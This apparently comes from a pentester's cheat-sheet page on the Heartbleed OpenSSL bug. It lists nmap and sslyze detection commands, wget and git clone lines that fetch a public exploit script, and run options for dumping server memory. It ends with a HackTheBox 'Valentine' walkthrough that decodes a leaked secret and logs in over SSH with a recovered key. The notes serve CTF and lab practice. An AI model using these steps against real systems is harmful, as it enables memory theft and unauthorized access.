heartbleed
Basics
Vulnerability in the popular OpenSSL cryptographic software library.
Allows anyone to read the memory of the systems protected by this vulnerable OpenSSL version.
Grabs a memory dump - Might find all kinds of goodies!!
"How the heartbleed bug works"
Meg: Server are you still there? if so reply 'HAT' with 500 letters
Detection
> nmap --script vuln $IP
> sslyze --heartbleed $IPExploit
google: python heartbleed github
-----------
Download
https://gist.github.com/eelsivart/10174134#file-heartbleed-py-L8
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
git clone https://gist.github.com/10174134.git
-----------
searchsploit -w heartbleed
https://exploit-db.com/exploits/32764
-----------
python heartbleed.py
python heartbleed.py -p 443 -n 10 $IP
./heartbleed.py $IP -n 500 -a output.txt ..winner
-n 500 ..Number of times to connect/loop (1 = default)
-a output.txt
grep '=' output.txt
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== ..valentineHTBExample
valentineHTB - had a ssh key password entered on 'decode.php'
hype_key was hidden somewhere else on the site :)
We can grab the memory, decode the key, and ssh to the box
-----------
decode.php
aGVhcnxyz== ..found
-----------
echo 'aGVhcnxyz==' | base64 -d ..mysecretkey
ssh -i hype_key hype@$IP ..connectLast updated
Was this helpful?